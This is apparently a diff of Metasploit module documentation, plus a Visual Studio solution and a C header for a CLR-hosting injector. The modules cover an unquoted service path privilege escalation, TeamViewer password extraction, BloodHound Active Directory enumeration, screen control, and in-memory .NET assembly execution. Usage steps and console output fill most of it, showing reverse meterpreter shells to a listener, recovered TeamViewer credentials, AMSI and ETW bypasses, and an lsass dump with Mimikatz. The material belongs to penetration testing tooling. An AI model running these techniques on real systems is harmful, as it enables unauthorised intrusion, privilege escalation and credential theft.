+If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `true`
+
+## Scenarios
+
+### Windows 10 (16299) with Service Listed Above
+
+
+```
+[*] Using exploit/windows/local/unquoted_service_path
+resource (unquoted.rb)> setg verbose true
+verbose => true
+resource (unquoted.rb)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (unquoted.rb)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unquoted.rb)> setg lport 4444
+lport => 4444
+resource (unquoted.rb)> set session 1
+session => 1
+msf5 exploit(windows/local/unquoted_service_path) > 
+[*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49696) at 2020-04-10 14:41:32 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(windows/local/unquoted_service_path) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Finding a vulnerable service...
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[+] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[*] Attempting exploitation of Some Vulnerable Service
+[*] Enumerating vulnerable paths
+[*] Checking writability to: C:\Program Files\A Subfolder\B Subfolder
+[-] Path not writable
+[*] Checking writability to: C:\Program Files\A Subfolder
+[+] Path is writable
+[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
+[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
+[+] Successfully wrote payload
+[*] Launching service Some Vulnerable Service...
+[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
+[-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
+[*] Exploit completed, but no session was created.
+```
+
+Manually start a handler, and restart the service (via GUI) to launch the exploit
+
+```
+msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
+[*] Payload handler running as background job 1.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf5 exploit(windows/local/unquoted_service_path) > [*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49708) at 2020-04-10 14:43:26 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+The most important part!!!
+
+```
+meterpreter > rm "C:\\Program Files\\A Subfolder\\B.exe"
+
+```
@@ -11,6 +11,14 @@
  This work is based on zhangyoufu's [unifi-backup-decrypt](https://github.com/zhangyoufu/unifi-backup-decrypt)
  and justingist's [POSH-Ubiquiti](https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1).  

+  The unf file has the following actions performed:
+
+  1. Decrypt the file
+  2. Fix the zip file if a `zip` utility is on the system
+  3. Extract db.gz
+  4. Unzip the db file
+  5. Import the db file
+
 ### Install Instructions

  1. Download the file from https://www.ui.com/download/unifi (Java required on Windows)
@@ -15,7 +15,7 @@ The following platforms are supported:
 ## Verification Steps

 1. Obtain a session.
-2. In msfconsole do `use post/multi/screensaver`.
+2. In msfconsole do `use post/multi/manage/screensaver`.
 3. Set the `SESSION` option.
 4. Choose the action you want to perform via `set action NAME` (available actions described below).
 5. Do `run`.
@@ -0,0 +1,19 @@
+This module allows you to view and control the screen of the target computer via a local browser window. The module continually screenshots the target screen and also relays all mouse and keyboard events to session.
+
+## Target sessions
+
+This module only supports some target sessions, where the keyboard, mouse and screenshot API are supported.
+
+* Windows (e.g windows/meterpreter/*)
+* OSX (e.g osx/x64/meterpreter/*)
+* Java (e.g java/meterpreter/*)
+
+## Verification Steps
+
+1. Obtain a native OSX or Windows session (or a Java session).
+2. In msfconsole do `use post/multi/manage/screenshare`.
+3. Set the `SESSION` option.
+4. Do `run`.
+5. Open the page in a javascript enabled browser
+
+
@@ -1,4 +1,5 @@
-## Overview
+## Vulnerable Application
+
 This is a post exploitation module for local privilege escalation bug
 which exists in Microsoft COM for windows when it fails to properly
 handle serialized objects.
@@ -7,29 +8,32 @@ handle serialized objects.
 * https://github.com/codewhitesec/UnmarshalPwn/
 * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824

-## Options
-
-"COMMAND" This command will be executed on successful escalation.</br>
-"SESSION" The session to run this module on.
-
-## Limitations
+### Limitations

 The payload will not spawn ant independent session it simply creates process with the system privilege.
 If the system is not vulnerable, then payload will execute but new process will not spawn.

 ## Verification Steps

-If you want to confirm the vulnerability before you add user or perform any other sensitive action. 
+If you want to confirm the vulnerability before you add user or perform any other sensitive action.

-1. `set COMMAND /s notepad.exe` 
-2. `run` 
+1. `set COMMAND /s notepad.exe`
+2. `run`

 Confirmation:

 Then go to meterpreter session and confirm running process (ps)
 If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system.

-## Usage
+## Options
+
+### COMMAND
+
+This command will be executed on successful escalation.</br>
+
+## Scenarios
+
+### Windows 10 (Build 15063)

 ```
 meterpreter > sysinfo
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+  This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex privilage elevation attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/bloodhound`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see that the module is running a powershell in the target machine
+  7. You should be ablte to see, after few minutes, that the module created a loot with the BloodHound results in zip format
+
+## Options
+
+  **CollectionMethode**
+
+  The collection method to use. This parameter accepts a comma separated list of values. Accepted values are Default, Group, LocalAdmin, RDP, DCOM, GPOLocalGroup, Session, ObjectProps, ComputerOnly, LoggedOn, Trusts, ACL, Container, DcOnly, All. The default method is Default.
+
+  **Domain**
+
+  Specifies the domain to enumerate. If not specified, will enumerate the current domain your user context specifies.
+
+  **SearchForest**
+
+  Expands data collection to include all domains in the forest. The default value is false.
+  
+  **Stealth**
+
+  Use stealth collection options, will sacrifice data quality in favor of much reduced network impact. The default value is false.
+
+  **SkipGCDeconfliction**
+
+  Skips Global Catalog deconfliction during session enumeration. This option can result in more inaccuracy in data. The default value is false.
+
+  **ExcludeDC**
+
+  Exclude domain controllers from session queries. Useful for ATA environments which detect this behavior. The default value is false.
+ 
+  **OU**
+
+  Limit enumeration to this OU. Takes a DistinguishedName.
+
+  **DomainController**
+
+  Specify which Domain Controller to request data from. Defaults to closest DC using Site Names.
+  
+  **LdapPort**
+
+  Override the port used to connect to LDAP. The default value is false.
+  
+  **SecureLdap**
+
+  Uses LDAPs instead of unencrypted LDAP on port 636. The default value is false.
+  
+  **IgnoreLdapCert**
+
+  Ignores the certificate for LDAP. The default value is false.
+
+  **LDAPUser**
+
+  User to connect to LDAP with.
+  
+  **LDAPPass**
+
+  Password for user you are connecting to LDAP with.
+
+  **DisableKerbSigning**
+
+  Disables Kerberos Signing on requests. The default value is false.
+
+  **Threads**
+
+  Specifies the number of threads to use during enumeration. The default value is 10.
+
+  **PingTimeout**
+
+  Specifies timeout for ping requests to computers in milliseconds. The default value is 259.
+
+  **SkipPing**
+
+  Skip all ping checks for computers. This option will most likely be slower as API calls will be made to all computers regardless of being up Use this option if ping is disabled on the network for some reason. The default value is false.
+
+  **LoopDelay**
+
+  Amount of time to wait between session enumeration loops in minutes. This option should be used in conjunction with the SessionLoop enumeration method. The default value is 300.
+  
+  **MaxLoopTime**
+
+  Length of time to run looped session collection. Format: 0d0h0m0s or any variation of this format. Use in conjunction with -CollectionMethod SessionLoop. Default will loop for two hours.
+
+## Expected Output
+
+```
+meterpreter > run post/windows/gather/bloodhound
+
+[*] Using URL: http://0.0.0.0:8080/bvqUdtHUQ4De1O3
+[*] Local IP: http://192.168.1.136:8080/bvqUdtHUQ4De1O3
+[*] Invoking BloodHound with: Invoke-BloodHound -CollectionMethod Default -Threads 10 -JSONFolder "C:\Windows\TEMP" -PingTimeout 250 -LoopDelay 300 
+[*] Initializing BloodHound at 6:44 AM on 4/29/2019
+[*] Resolved Collection Methods to Group, LocalAdmin, Session, Trusts
+[*] Starting Enumeration for uplift.local
+[*] Status: 58 objects enumerated (+58 �/s --- Using 58 MB RAM )
+[*] Finished enumeration for uplift.local in 00:00:00.6365050
+[*] 0 hosts failed ping. 0 hosts timedout.
+[*] 
+[*] Compressing data to C:\Windows\TEMP\20190429064444_BloodHound.zip.
+[*] You can upload this file directly to the UI.
+[*] Finished compressing files!
+```
@@ -2,17 +2,22 @@

  Any Windows host with a `meterpreter` session and TeamViewer 7+
  installed. The following passwords will be searched for and recovered:
-  
+
+  This module allows to enumerate window information to get the control ID
+  and Password of TeamViewer. 
+
  * Options Password -- All module-supported TeamViewer versions (7+)
  * Unattended Password -- TeamViewer versions 7 - 9
  * License Key -- TeamViewer versions 7 - 14
-  
+
 ### Installation Steps

  1. Download the latest installer of TeamViewer.
  2. Select "Custom Install With Unattended Password" during
+
    installation
  3. After installation, navigate to
+
    `Extra > Options > Security > Advanced > Show Advanced Settings` and
    set the "Options Password"
    * Options can also be exported to a .reg file from here.
@@ -22,10 +27,14 @@
  1. Get a `meterpreter` session on a Windows host.
  2. Do: ```run post/windows/gather/credentials/teamviewer_passwords```
  3. If the system has registry keys for TeamViewer passwords they will be printed out.
+    4. Print the control ID and password.
+    5.  If there is a email and password in the login box, the email and password will be printed.

 ## Options

-  None.
+ **WINDOW_TITLE**
+
+Specify a title for getting the window handle, e.g.:TeamViewer',Default is `TeamViewer`

 ## Scenarios

@@ -36,5 +45,17 @@ meterpreter > run post/windows/gather/credentials/teamviewer_passwords
 [+] Found Exported Unattended Password: P@$$w0rd
 [+] Found Options Password: op*****5
 [+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
-meterpreter > 
+[*] <---------------- | Using Window Technique | ---------------->
+[*] TeamViewer's language setting options are 'zhCN'
+[*] TeamViewer's version is '15.3.2682 '
+[+] TeamViewer's  title is 'TeamViewer'
+[*] Found handle to ID edit box 0x000502a8
+[*] Found handle to Password edit box 0x00050248
+[+] ID: 1 561 912 659
+[+] PASSWORD: AUdbM71f<_
+[*] Found handle to Email edit box 0x000501cc
+[*] Found handle to Password edit box 0x000501e2
+[+] EMAIL: kali-team@qq.com
+[+] PASSWORD: Mypassword.
+meterpreter >
 ```
@@ -0,0 +1,240 @@
+# Execute .Net assembly via Meterpreter session
+
+This module to executing a .NET Assembly from Meterpreter session
+
+It spawn a process (or use an existing process providing pid) and use Reflective dll injection to load HostingCLRx64.dll needed to run .Net assembly
+The unmanaged injected dll takes care of verifying if the process has already loaded the clr, and loads it if necessary. The version of the CLR to be loaded is determined by executing the parsing of the assembly provided searching for a known signature. Then run the assembly from memory.
+Before loading the assembly in the context of the clr, Amsi is bypassed using the AmsiScanBuffer patching technique (https://rastamouse.me/2018/10/amsiscanbuffer-bypass-part-1/)
+
+You'll find details at [Execute assembly via Meterpreter session](https://b4rtik.blogspot.com/2018/12/execute-assembly-via-meterpreter-session.html)
+
+## Verification Steps
+
+  Example 1 no PID specified:
+
+  1. Start Clone from github SeatBelt or other .Net progect
+  2. Buid project with target framework 4.x or 3.5
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set DOTNET_EXE /your/output/folder/file.exe```
+  7. Do: ```set ARGUMENTS user```
+  8. Do: ```run```
+  9. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching notepad.exe to host CLR...
+[+] Process 10628 launched.
+[*] Reflectively injecting the Host DLL into 10628..
+[*] Injecting Host into 10628...
+[*] Host injected. Copy assembly into 10628...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] 
+[+] 
+[+]                         %&&@@@&&                                                                                  
+[+]                         &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
+[+]                         &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
+[+] %%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
+[+] #%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
+[+] #%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
+[+] #####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
+[+] #######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
+[+] ###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
+[+] #####%######################  %%%..                       @////(((&%%%%%%%################                        
+[+]                         &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
+[+]                         &%%&&&%%%%%        v0.2.0         ,(((&%%%%%%%%%%%%%%%%%,                                 
+[+]                          #%%%%##,                                                                                 
+.........
+.........
+.........
+[+]   [*] Use the Mimikatz "dpapi::cred" module with appropriate /masterkey to decrypt
+[+] 
+[+] 
+[+] === Checking for RDCMan Settings Files (Current User) ===
+[+] 
+[+] 
+[+] 
+[+] [*] Completed Safety Checks in 11 seconds
+[+] 
+[*] End output.
+[+] Killing process 10628
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+  Example 2 PID specified:
+
+  1. Start Clone from github SeatBelt or other .Net progect
+  2. Buid project with target framework 4.x or 3.5
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set PID 8648```
+  7. Do: ```set ASSEMBLYPATH /your/output/folder/SeatBelt.exe```
+  8. Do: ```set ARGUMENTS user```
+  9. Do: ```run```
+  10. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Warning: output unavailable
+[*] Hooking 8648 to host CLR...
+[+] Process 8648 hooked.
+[*] Reflectively injecting the Host DLL into 8648..
+[*] Injecting Host into 8648...
+[*] Host injected. Copy assembly into 8648...
+[*] Assembly copied.
+[*] Executing...
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+  Example 3 perform the functionality test of the Amsi bypass.
+  To perform the test it is necessary to use an assembly that runs 
+  Assembly.Load to load an assembly that we know to be detected. 
+  In the following example we use SafetyKatz which dynamically 
+  loads Mimikatz via Assmbly.Load
+  
+  1. Start Clone from github SafetyKatz or other .Net progect
+  2. Buid project with target framework 4.x
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set PID 8648```
+  7. Do: ```set DOTNET_EXE /your/output/folder/SafetyKatz.exe```
+  8. Do: ```set ARGUMENTS user```
+  9. Do: ```set PROCESS nslookup.exe```
+  10. Do: ```set AMSIBYPASS false```
+  11. Do: ```run```
+  12. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching nslookup.exe to host CLR...
+[+] Process 19904 launched.
+[*] Reflectively injecting the Host DLL into 19904..
+[*] Injecting Host into 19904...
+[*] Host injected. Copy assembly into 19904...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] Server predefinito:  
+[+] Address:  192.168.1.1
+[+] 
+[+] > 
+[*] End output.
+[+] Killing process 19904
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+Than
+
+  1. Do: ```set AMSIBYPASS true```
+  2. Do: ```run```
+  
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > set amsibypass true
+amsibypass => true
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching nslookup.exe to host CLR...
+[+] Process 19568 launched.
+[*] Reflectively injecting the Host DLL into 19568..
+[*] Injecting Host into 19568...
+[*] Host injected. Copy assembly into 19568...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] Server predefinito:  
+[+] Address:  192.168.1.1
+[+] 
+[+] > 
+[+] [*] Dumping lsass (744) to C:\WINDOWS\Temp\debug.bin
+[+] [+] Dump successful!
+[+] 
+[+] [*] Executing loaded Mimikatz PE
+[+] 
+[+]   .#####.   mimikatz 2.1.1 (x64) built on Jul  7 2018 03:36:26 - lil!
+[+]  .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+[+]  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+[+]  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+[+]  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
+[+]   '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
+[+] 
+[+] mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
+[+] ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
+[+] Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
+[+] ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
+[+] 
+[+] mimikatz # deleting C:\Windows\Temp\debug.bin
+[+] Execution started
+[+] ICorRuntimeHost->GetDefaultDomain(...) succeeded
+[*] End output.
+[+] Killing process 19568
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+## Options
+
+```
+Module options (post/windows/manage/execute_dotnet_assembly):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   AMSIBYPASS      true             yes       Enable Amsi bypass
+   ARGUMENTS                        no        Command line arguments
+   DOTNET_EXE                       yes       Assembly file name
+   ETWBYPASS       true             yes       Enable Etw bypass
+   PID             0                no        Pid  to inject
+   PPID            0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   PROCESS         notepad.exe      no        Process to spawn
+   SESSION                          yes       The session to run this module on.
+   USETHREADTOKEN  true             no        Spawn process with thread impersonation
+   WAIT            10               no        Time in seconds to wait
+
+
+```
+
+AMSIBYPASS
+
+Enable or Disable Amsi bypass. This parameter is necessary due to the technique used. It is possible that subsequent updates will make the bypass unstable which could result in a crash. By setting the parameter to false the module continues to work.
+
+ARGUMENTS
+
+Command line arguments. The signature of the Main method must match with the parameters that have been set in the module, for example:
+
+If the property ARGUMENTS is set to "antani sblinda destra" the main method should be "static void main (string [] args)"<br />
+If the property ARGUMENTS is set to "" the main method should be "static void main ()"
+
+DOTNET_EXE 
+
+Dotnet Executable to execute
+
+PID
+
+Pid to inject. If different from 0 the module does not create a new process but uses the existing process identified by the PID parameter.
+
+PROCESS
+
+Process to spawn when PID is equal to 0.
+
+SESSION
+
+The session to run this module on. Must be meterpreter session
+
+WAIT
+
+Time in seconds to wait before starting to read the output.
+
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.28010.2050
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HostingCLR", "HostingCLR\HostingCLR.vcxproj", "{C5ADDA72-8591-417A-BCE3-279EC6960FE2}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|Win32.ActiveCfg = Debug|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|Win32.Build.0 = Debug|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|x64.ActiveCfg = Debug|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|x64.Build.0 = Debug|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|Win32.ActiveCfg = Release|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|Win32.Build.0 = Release|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|x64.ActiveCfg = Release|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {0DB82037-EA50-4013-84D9-44DD37ADA084}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,239 @@
+#pragma once
+
+#include <Windows.h>
+
+#define STATUS_SUCCESS 0
+#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+typedef struct _PEB_LDR_DATA {
+	ULONG Length;
+	BOOLEAN Initialized;
+	HANDLE SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	PVOID EntryInProgress;
+	BOOLEAN ShutdownInProgress;
+	HANDLE ShutdownThreadId;
+} PEB_LDR_DATA, *PPEB_LDR_DATA;
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+	BYTE           Reserved1[16];
+	PVOID          Reserved2[10];
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _API_SET_NAMESPACE {
+	ULONG Version;
+	ULONG Size;
+	ULONG Flags;
+	ULONG Count;
+	ULONG EntryOffset;
+	ULONG HashOffset;
+	ULONG HashFactor;
+} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;
+
+// Partial PEB
+typedef struct _PEB {
+	BOOLEAN InheritedAddressSpace;
+	BOOLEAN ReadImageFileExecOptions;
+	BOOLEAN BeingDebugged;
+	union
+	{
+		BOOLEAN BitField;
+		struct
+		{
+			BOOLEAN ImageUsesLargePages : 1;
+			BOOLEAN IsProtectedProcess : 1;
+			BOOLEAN IsLegacyProcess : 1;
+			BOOLEAN IsImageDynamicallyRelocated : 1;
+			BOOLEAN SkipPatchingUser32Forwarders : 1;
+			BOOLEAN SpareBits : 3;
+		};
+	};
+	HANDLE Mutant;
+
+	PVOID ImageBaseAddress;
+	PPEB_LDR_DATA Ldr;
+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+	PVOID SubSystemData;
+	PVOID ProcessHeap;
+	PRTL_CRITICAL_SECTION FastPebLock;
+	PVOID IFEOKey;
+	PSLIST_HEADER AtlThunkSListPtr;
+	union
+	{
+		ULONG CrossProcessFlags;
+		struct
+		{
+			ULONG ProcessInJob : 1;
+			ULONG ProcessInitializing : 1;
+			ULONG ProcessUsingVEH : 1;
+			ULONG ProcessUsingVCH : 1;
+			ULONG ProcessUsingFTH : 1;
+			ULONG ProcessPreviouslyThrottled : 1;
+			ULONG ProcessCurrentlyThrottled : 1;
+			ULONG ProcessImagesHotPatched : 1;
+			ULONG ReservedBits0 : 24;
+		};
+	};
+	union
+	{
+		PVOID KernelCallbackTable;
+		PVOID UserSharedInfoPtr;
+	};
+	ULONG SystemReserved;
+	ULONG AtlThunkSListPtr32;
+	PAPI_SET_NAMESPACE ApiSetMap;
+	ULONG TlsExpansionCounter;
+	PVOID TlsBitmap;
+	ULONG TlsBitmapBits[2];
+	PVOID ReadOnlySharedMemoryBase;
+	PVOID SharedData;
+	PVOID *ReadOnlyStaticServerData;
+	PVOID AnsiCodePageData;
+	PVOID OemCodePageData;
+	PVOID UnicodeCaseTableData;
+	ULONG NumberOfProcessors;
+	ULONG NtGlobalFlag;
+	ULARGE_INTEGER CriticalSectionTimeout;
+	SIZE_T HeapSegmentReserve;
+	SIZE_T HeapSegmentCommit;
+	SIZE_T HeapDeCommitTotalFreeThreshold;
+	SIZE_T HeapDeCommitFreeBlockThreshold;
+	ULONG NumberOfHeaps;
+	ULONG MaximumNumberOfHeaps;
+	PVOID *ProcessHeaps;
+	PVOID GdiSharedHandleTable;
+	PVOID ProcessStarterHelper;
+	ULONG GdiDCAttributeList;
+	PRTL_CRITICAL_SECTION LoaderLock;
+	ULONG OSMajorVersion;
+	ULONG OSMinorVersion;
+	USHORT OSBuildNumber;
+} PEB, *PPEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	union
+	{
+		LIST_ENTRY InInitializationOrderLinks;
+		LIST_ENTRY InProgressLinks;
+	};
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+	ULONG Flags;
+	WORD LoadCount;
+	WORD TlsIndex;
+	union
+	{
+		LIST_ENTRY HashLinks;
+		struct
+		{
+			PVOID SectionPointer;
+			ULONG CheckSum;
+		};
+	};
+	union
+	{
+		ULONG TimeDateStamp;
+		PVOID LoadedImports;
+	};
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _TEB {
+	PVOID Reserved1[12];
+	PPEB  ProcessEnvironmentBlock;
+	PVOID Reserved2[399];
+	BYTE  Reserved3[1952];
+	PVOID TlsSlots[64];
+	BYTE  Reserved4[8];
+	PVOID Reserved5[26];
+	PVOID ReservedForOle;
+	PVOID Reserved6[4];
+	PVOID TlsExpansionSlots;
+} TEB, *PTEB;
+
+typedef ULONG(NTAPI *_EtwEventWrite)(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
+	);
+
+typedef ULONG(NTAPI *_EtwEventWriteFull)(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in USHORT EventProperty,
+	__in_opt LPCGUID ActivityId,
+	__in_opt LPCGUID RelatedActivityId,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
+	);
+
+// Windows 7 SP1 / Server 2008 R2 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+// Windows 8 / Server 2012 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
